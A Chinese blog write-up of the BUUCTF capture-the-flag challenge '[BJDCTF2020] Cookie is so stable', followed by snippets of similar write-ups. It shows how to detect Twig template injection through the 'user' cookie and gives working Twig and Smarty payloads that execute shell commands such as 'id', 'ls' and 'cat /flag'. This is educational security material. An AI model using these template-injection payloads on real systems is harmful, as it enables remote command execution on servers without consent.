buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)

最新推荐文章于 2024-07-22 17:19:45 发布
最新推荐文章于 2024-07-22 17:19:45 发布
阅读量3.3k 收藏 13
点赞数 10
分类专栏: buuctf 文章标签: 安全 web安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/123011238
版权
本文详细介绍了如何通过分析HTTP包和利用服务端模板注入(SSTI)中的Twig攻击来解决BJDCTF2020的Cookieissostable挑战。通过输入特定payload,判断模板注入类型为Twig,并最终构造payload获取Flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)

先看一下题目

有首页,有flag页面,有Hint页面

这里题目有提示,突破口是在cookie上面

这里先进行抓包分析

这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击

这里有判断模板注入类型的办法

输入{{7*‘7’}},返回49表示是 Twig 模块

输入{{7*‘7’}},返回7777777表示是 Jinja2 模块

这里在cookie处进行判断

user={{7*‘7’}},查看返回值

所以这个模板注入是Twig注入

这里注意要在PHPSESSID后user前加上;分隔开

由于是Twig注入,所以是有固定的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}//查看id

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

同样的方法,在cookie输入

然后构造获取flag的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

BuuctfCookie is so stable
m0_64444909的博客
04-12 531
1.本题需要了解到服务端模板注入攻击,SSTI里的Twig攻击。 这里大家要想详细了解可以查看这里的两篇博客 智慧门 安全门 测试为Twig还是jinja2模块的方法: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 2.尝试输入以后发现本题为Twig模块 3.Twig模块的payload自己记录下来,下次需要直接复制即可 PS: 先要把exec() 作为回调函数传进去就能实现命令执行了 (1)首先要先查看id,用BP抓包放包即可
[BJDCTF2020]Cookie is so stable1
m0_73673698的博客
06-13 764
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开题目,看到如下页面。
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 607
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
BUUCTF:[BJDCTF2020]Cookie is so stable
qq_46230755的博客
12-27 318
打开后发现有一个flag选项卡,进去后发现有一个输入框 简单测试一下 发现存在着模板注入 (别的师傅那copy的流程图) 如果是Twig,输入{{7*'7'}} 输出49 如果是Jinja,输入{{7*'7'}} 输出7777777 这题是Twig 在hint.php的源码中,对我们进行了提示 我们进行抓包,然后发现cookie里的user是注入点,直接构造payload user={{_self.env.registerUndefinedFilterCallback("exec")}}{.
[BJDCTF2020]Cookie is so stable
Sk1y的博客
04-05 1976
考查的地方:模板注入,利用Twig模板本身的性进行攻击
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3874
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2846
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
BUUCTF [BJDCTF2020]Cookie is so stable
最新发布
weixin_73399382的博客
07-22 649
这道题先点了一下没发现什么get参数,dirsearch和githack都扫了一下没啥收获,后面在hint源码中发现一行注释让我们仔细看cookie又回去在flag页面随便输个名字(只有这里有操作的地方),看到发了两个数据包,post方式包里面带两个请求体参数,不过cookie没有什么异常get型数据包里面发现多了一个参数usercookie一般存在什么问题,伪造身份,注入?这里伪造身份肯定不存在,那就只能注入了,但是有个问题是我们输入的数据被当做数据打印出来了,那就没法sql注入。
BUUCTF-web-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 918
BUUCTF-web-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
BUUCTF之[BJDCTF2020]Cookie is so stable ----- SSTI注入
weixin_44632787的博客
06-26 1702
BUUCTF之[BJDCTF2020]Cookie is so stable 题目 知识点:服务端模板注入攻击。SSTI里的Twig攻击。从网上找来的图片。参考链接:服务端模板注入攻击 然后网上提示说: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 然后这题是 Twig 模块,用到的payload是: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_sel
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 834
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 424
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值